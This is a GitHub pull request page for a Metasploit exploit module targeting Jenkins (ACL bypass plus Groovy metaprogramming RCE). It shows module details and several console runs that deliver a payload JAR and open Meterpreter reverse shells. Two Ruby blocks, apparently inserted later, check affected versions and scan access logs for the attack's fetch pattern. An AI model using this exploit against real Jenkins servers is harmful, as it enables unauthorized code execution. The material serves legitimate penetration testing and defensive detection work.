
Add Jenkins ACL bypass and metaprogramming RCE #11466

Merged: 5 commits merged into rapid7:master on Mar 18, 2019

Conversation

wvu-r7 (Contributor) commented Feb 23, 2019

WIP

To-do

  • Add check method
  • Randomize strings
  • Clean up JAR (#11530)
  • ???

Usage

msf5 exploit(multi/http/jenkins_metaprogramming) > info

       Name: Jenkins ACL Bypass and Metaprogramming RCE
     Module: exploit/multi/http/jenkins_metaprogramming
   Platform: Java
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-01-08

Provided by:
  Orange Tsai
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     127.0.0.1        yes       The target address range or CIDR identifier
  RPORT      8080             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8081             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path to Jenkins
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in Jenkins dynamic routing to
  bypass the Overall/Read ACL and leverage Groovy metaprogramming to
  download and execute a malicious JAR file. The ACL bypass gadget is
  specific to Jenkins <= 2.137 and will not work on later versions of
  Jenkins. Tested against Jenkins 2.137 and Pipeline: Groovy Plugin
  2.61.

References:
  https://cvedetails.com/cve/CVE-2019-1003000/
  https://cvedetails.com/cve/CVE-2019-1003001/
  https://cvedetails.com/cve/CVE-2019-1003002/
  https://www.exploit-db.com/exploits/46427
  https://jenkins.io/security/advisory/2019-01-08/
  https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
  https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
  https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started HTTPS reverse handler on https://192.168.1.2:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.2:8081/
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
[-] Sending 404
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending 200
[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending payload JAR
[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer    : 6f21b8da2915
OS          : Linux 4.9.93-linuxkit-aufs (amd64)
Meterpreter : java/linux
meterpreter >
wvu@kharak:~$ for i in {0..9}; do curl http://127.0.0.1:8081/path/to/wrong/payload.jar; done
I'll index the mobile CSS driver, that should circuit the TCP driver!
If we calculate the hard drive, we can get to the COM driver through the cross-platform ADP matrix!
I'll copy the bluetooth JBOD panel, that should panel the GB transmitter!
Try to quantify the PCI driver, maybe it will synthesize the mobile protocol!
The SMTP array is down, calculate the neural transmitter so we can bypass the SDD application!
Try to copy the SAS application, maybe it will calculate the mobile transmitter!
You can't transmit the interface without synthesizing the cross-platform COM pixel!
Try to input the RSS capacitor, maybe it will calculate the redundant capacitor!
The SCSI microchip is down, parse the open-source alarm so we can parse the IB array!
You can't index the driver without calculating the optical PNG bus!
wvu@kharak:~$

Resolves #11459.
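The target list above gives a version window, "Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)", and the description notes that the ACL bypass gadget is specific to core <= 2.137. As an added example for Jenkins administrators (not code from this PR or from the Metasploit module), the script below turns that window into a check. It assumes the core version is read from the X-Jenkins response header (Jenkins does send that header) and that the Pipeline: Groovy (workflow-cps) plugin version is supplied separately, e.g. from the plugin manager; the header hashes and plugin versions fed to it below are constructed samples.

```ruby
# Added example, not code from the PR or the Metasploit module: classify a
# Jenkins instance against the module's target window,
# "Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)".
require 'rubygems' # Gem::Version compares dotted versions segment by segment

# Upper bounds taken from the module's target list.
MAX_AFFECTED_JENKINS      = Gem::Version.new('2.137')
MAX_AFFECTED_WORKFLOW_CPS = Gem::Version.new('2.61')

# Jenkins reports its core version in the X-Jenkins response header. The
# header hash passed in is a constructed sample, not a live response.
# Returns a Gem::Version, or nil when the header is absent or not a version.
def jenkins_version_from_headers(headers)
  pair = headers.find { |name, _| name.to_s.casecmp?('X-Jenkins') }
  value = pair && pair.last.to_s.strip
  return nil unless value && value.match?(/\A\d+(\.\d+)*\z/)
  Gem::Version.new(value)
end

# The ACL bypass gadget only applies to core <= 2.137 (per the module text).
def acl_bypass_window?(core_version)
  !core_version.nil? && core_version <= MAX_AFFECTED_JENKINS
end

# Pipeline: Groovy (workflow-cps) <= 2.61 is the plugin side of the target.
def groovy_plugin_window?(plugin_version)
  return false unless plugin_version.to_s.match?(/\A\d+(\.\d+)*\z/)
  Gem::Version.new(plugin_version.to_s) <= MAX_AFFECTED_WORKFLOW_CPS
end

# Summarise both checks; :in_target_window is true only when both hold,
# which is what "Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)" means.
def assess(headers, workflow_cps_version)
  core = jenkins_version_from_headers(headers)
  acl  = acl_bypass_window?(core)
  plug = groovy_plugin_window?(workflow_cps_version)
  { jenkins: core && core.to_s, acl_bypass_gadget: acl,
    groovy_plugin: plug, in_target_window: acl && plug }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed samples: the PR's test target, a newer version, and no header.
  puts assess({ 'X-Jenkins' => '2.137' }, '2.61').inspect
  puts assess({ 'X-Jenkins' => '2.150.1' }, '2.63').inspect
  puts assess({}, '2.61').inspect
end
```

A host that is outside the ACL bypass window but still inside the plugin window is reported with the two flags separately, since the description only says the bypass gadget stops working after 2.137, not that the plugin issue does.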

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from f3c0352 to bd8ff8c Feb 23, 2019
@wvu-r7 wvu-r7 added the needs-docs label Feb 23, 2019
@jrobles-r7 jrobles-r7 self-assigned this Mar 5, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch 3 times, most recently from 48bc498 to 9b7118c Mar 6, 2019
jrobles-r7 (Contributor) commented Mar 6, 2019

msf5 exploit(multi/http/jenkins_metaprogramming) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Using URL: http://172.22.222.136:8080/metasploit/exploit/1.0/exploit-1.0.jar
[*] Sending stage (53866 bytes) to 172.22.222.135
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.135:39154) at 2019-03-06 07:21:32 -0600
[*] Server stopped.

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer    : 72c4b46de4df
OS          : Linux 4.18.0-15-generic (amd64)
Meterpreter : java/linux
meterpreter > 
wvu-r7 (Contributor, Author) commented Mar 6, 2019

I've got a big commit addressing the current to-dos, but I introduced a regression that causes the exploit to fail. Still hunting that down.

This is fixed now. The regression was in handling HEAD vs. GET and .pom vs. .jar in on_request_uri with respect to the resource given to start_service.
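The HEAD/GET and .pom/.jar handling mentioned in the comment above is the serving side of the artifact-resolution sequence visible in the sample run of the first post (HEAD .pom -> 404, HEAD .jar -> 200, GET .jar -> payload). As an added example for defenders (not code from the PR or the module), the script below looks for that sequence in web-server or proxy access logs: a client resolving Maven-style coordinates where the .pom is missing but the .jar is served. The log lines are constructed in Common Log Format, with client addresses and artifact names borrowed from the PR's sample output; the on-disk path it reports is the one named in the module's cleanup warning ($HOME/.groovy/grapes/<group>).

```ruby
# Added example, not code from the PR or the Metasploit module: flag the
# artifact-fetch sequence shown in the module's sample run (HEAD .pom -> 404,
# HEAD .jar -> 200, GET .jar) in access logs. Sample lines are constructed.

# Maven-style coordinates as laid out in a repository URL:
#   /<group path>/<artifact>/<version>/<artifact>-<version>.(pom|jar)
ARTIFACT_PATH = %r{\A/(?<group>.+)/(?<artifact>[^/]+)/(?<version>[^/]+)/\k<artifact>-\k<version>\.(?<ext>pom|jar)\z}

# Common Log Format: client ident user [time] "method path proto" status size
CLF = /\A(?<client>\S+) \S+ \S+ \[[^\]]+\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Constructed log: first three lines mirror the PR's run, the rest are benign.
SAMPLE_LOG = <<~LOG
  172.22.222.135 - - [18/Mar/2019:07:22:33 -0500] "HEAD /SpencerHackett/Fintone/0.0.6/Fintone-0.0.6.pom HTTP/1.1" 404 0
  172.22.222.135 - - [18/Mar/2019:07:22:33 -0500] "HEAD /SpencerHackett/Fintone/0.0.6/Fintone-0.0.6.jar HTTP/1.1" 200 0
  172.22.222.135 - - [18/Mar/2019:07:22:33 -0500] "GET /SpencerHackett/Fintone/0.0.6/Fintone-0.0.6.jar HTTP/1.1" 200 54399
  10.0.0.7 - - [18/Mar/2019:07:30:01 -0500] "HEAD /org/example/lib/1.0/lib-1.0.pom HTTP/1.1" 200 0
  10.0.0.7 - - [18/Mar/2019:07:30:01 -0500] "GET /org/example/lib/1.0/lib-1.0.jar HTTP/1.1" 200 1024
  10.0.0.9 - - [18/Mar/2019:07:31:00 -0500] "GET /index.html HTTP/1.1" 200 512
LOG

# Parse one line into client, method, status, artifact coordinates and file
# extension; returns nil for lines that are not artifact requests.
def parse_line(line)
  m = CLF.match(line)
  return nil unless m
  a = ARTIFACT_PATH.match(m[:path])
  return nil unless a
  { client: m[:client], method: m[:method], status: m[:status].to_i,
    coords: [a[:group], a[:artifact], a[:version]], ext: a[:ext] }
end

# Group requests by (client, coordinates) and flag the combination the sample
# run shows: the .pom was never there (404) yet the .jar was fetched (200).
# A normal repository serves the .pom alongside the .jar.
def suspicious_fetches(log_text)
  by_key = Hash.new { |h, k| h[k] = [] }
  log_text.each_line do |line|
    req = parse_line(line.strip)
    by_key[[req[:client], req[:coords]]] << req if req
  end
  by_key.each_with_object([]) do |((client, coords), reqs), hits|
    pom_missing = reqs.any? { |r| r[:ext] == 'pom' && r[:status] == 404 }
    jar_fetched = reqs.any? { |r| r[:ext] == 'jar' && r[:method] == 'GET' && r[:status] == 200 }
    next unless pom_missing && jar_fetched
    group, artifact, version = coords
    hits << { client: client, group: group, artifact: artifact, version: version,
              # Grape cache location named in the module's cleanup warning.
              on_disk: "$HOME/.groovy/grapes/#{group}" }
  end
end

if __FILE__ == $PROGRAM_NAME
  suspicious_fetches(SAMPLE_LOG).each do |h|
    puts "#{h[:client]} fetched #{h[:group]}:#{h[:artifact]}:#{h[:version]} " \
         "without a .pom; check #{h[:on_disk]} on that host"
  end
end
```

Run against real logs, pair the hit with the host the client address belongs to: a Jenkins host whose Grape cache contains a group it never declared in any pipeline is the artifacts-on-disk indicator the module's side-effects list warns about.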

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch 3 times, most recently from a100b42 to a46303b Mar 12, 2019
@wvu-r7 wvu-r7 changed the title [WIP] Add Jenkins ACL bypass and metaprogramming RCE Add Jenkins ACL bypass and metaprogramming RCE Mar 15, 2019
@wvu-r7 wvu-r7 removed the delayed label Mar 15, 2019
@wvu-r7 wvu-r7 marked this pull request as ready for review Mar 15, 2019
@wvu-r7 wvu-r7 removed the needs-docs label Mar 15, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 4469964 to 56c8b17 Mar 15, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 53fd730 to 4cc5803 Mar 16, 2019
@wvu-r7 wvu-r7 added the delayed label Mar 16, 2019
bcoles (Contributor) commented Mar 16, 2019

FWIW, may be useful for testing or documentation: https://www.turnkeylinux.org/jenkins

wvu-r7 (Contributor, Author) commented Mar 16, 2019

Looks like for TurnKey, you want to download https://www.turnkeylinux.org/download?file=turnkey-jenkins-15.0-stretch-amd64.iso and then install https://updates.jenkins.io/download/plugins/workflow-cps/2.61/workflow-cps.hpi with all its dependencies:

java.io.IOException: Pipeline: Groovy v2.61 failed to load.
 - Script Security Plugin v1.44 is older than required. To fix, install v1.48 or later.
 - Pipeline: API v2.29 is older than required. To fix, install v2.30 or later.
 - Structs Plugin v1.14 is older than required. To fix, install v1.17 or later.
 - ace-editor v1.0.1 is missing. To fix, install v1.0.1 or later.
 - jquery-detached v1.2.1 is missing. To fix, install v1.2.1 or later.
 - workflow-support v2.21 is missing. To fix, install v2.21 or later.
	at hudson.PluginWrapper.resolvePluginDependencies(PluginWrapper.java:655)
	at hudson.PluginManager.dynamicLoad(PluginManager.java:878)
Caused: java.io.IOException: Failed to install workflow-cps plugin
	at hudson.PluginManager.dynamicLoad(PluginManager.java:888)
	at hudson.PluginManager.dynamicLoad(PluginManager.java:824)
	at hudson.model.UpdateCenter$InstallationJob._run(UpdateCenter.java:1880)
Caused: java.io.IOException: Failed to dynamically deploy this plugin
	at hudson.model.UpdateCenter$InstallationJob._run(UpdateCenter.java:1884)
	at hudson.model.UpdateCenter$DownloadJob.run(UpdateCenter.java:1642)
	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
	at hudson.remoting.AtmostOneThreadExecutor$Worker.run(AtmostOneThreadExecutor.java:112)
	at java.lang.Thread.run(Thread.java:748)

Perhaps this is why it's easier to install it once and then package the Jenkins home directory.

@wvu-r7 wvu-r7 added delayed and removed delayed labels Mar 16, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 14887e9 to abf4ae7 Mar 16, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch 4 times, most recently from 5ee017c to 59b625c Mar 16, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 59b625c to e505bf1 Mar 16, 2019
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from e505bf1 to b2c21c7 Mar 16, 2019
wvu-r7 (Contributor, Author) commented Mar 16, 2019

Today I fail at Git.

I tried to create a more reasonable history, but the timestamps were off. I think I've distilled the logical changes into the right commits on an appropriate timeline.

I won't be touching this again. Happy weekend!

phra approved these changes Mar 17, 2019
wvu-r7 (Contributor, Author) commented Mar 17, 2019

Thanks, @phra. Sorry the HTTPS staging didn't work out.

phra (Contributor) commented Mar 17, 2019

@wvu-r7 no worries, good job!

@jrobles-r7 jrobles-r7 merged commit 6658584 into rapid7:master Mar 18, 2019
3 checks passed:
  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed
jrobles-r7 added a commit that referenced this pull request Mar 18, 2019
msjenkins-r7 added a commit that referenced this pull request Mar 18, 2019
jrobles-r7 (Contributor) commented Mar 18, 2019

Release Notes

The multi/http/jenkins_metaprogramming exploit module has been added to the framework. This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file.

jrobles-r7 (Contributor) commented Mar 18, 2019

$ ./msfconsole -q
msf5 > use exploit/multi/http/jenkins_metaprogramming
msf5 exploit(multi/http/jenkins_metaprogramming) > set rhosts 172.22.222.135
rhosts => 172.22.222.135
msf5 exploit(multi/http/jenkins_metaprogramming) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/http/jenkins_metaprogramming) > set verbose true
verbose => true
msf5 exploit(multi/http/jenkins_metaprogramming) > exploit

[*] Started HTTPS reverse handler on https://172.22.222.136:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.171.150:8080/
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /SpencerHackett/Fintone/0.0.6/Fintone-0.0.6.pom requested
[-] Sending 404
[*] HEAD /SpencerHackett/Fintone/0.0.6/Fintone-0.0.6.jar requested
[+] Sending 200
[*] GET /SpencerHackett/Fintone/0.0.6/Fintone-0.0.6.jar requested
[+] Sending payload JAR
[*] https://172.22.222.136:8443 handling request from 172.22.222.135; (UUID: p3enhxfx) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (172.22.222.136:8443 -> 172.22.222.135:48982) at 2019-03-18 07:22:34 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/SpencerHackett' on the target

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer    : 40736eb4c625
OS          : Linux 4.18.0-16-generic (amd64)
Meterpreter : java/linux
meterpreter >
@wvu-r7 wvu-r7 deleted the wvu-r7:feature/jenkins branch Mar 18, 2019
wvu-r7 (Contributor, Author) commented Mar 21, 2019

I lost some changes in the fervent rebasing. I think this is the first time rebasing has bitten me, so I'm a bit surprised. I'll be more careful next time. #11606 addresses the lost changes. Thanks.

wvu-r7 (Contributor, Author) commented Mar 22, 2019

Notice to visitors

If you're coming here from Twitter or elsewhere, please use Git to manage your copy of this module if at all possible. Otherwise you can find the latest copy here, NOT in this pull request. Thanks!
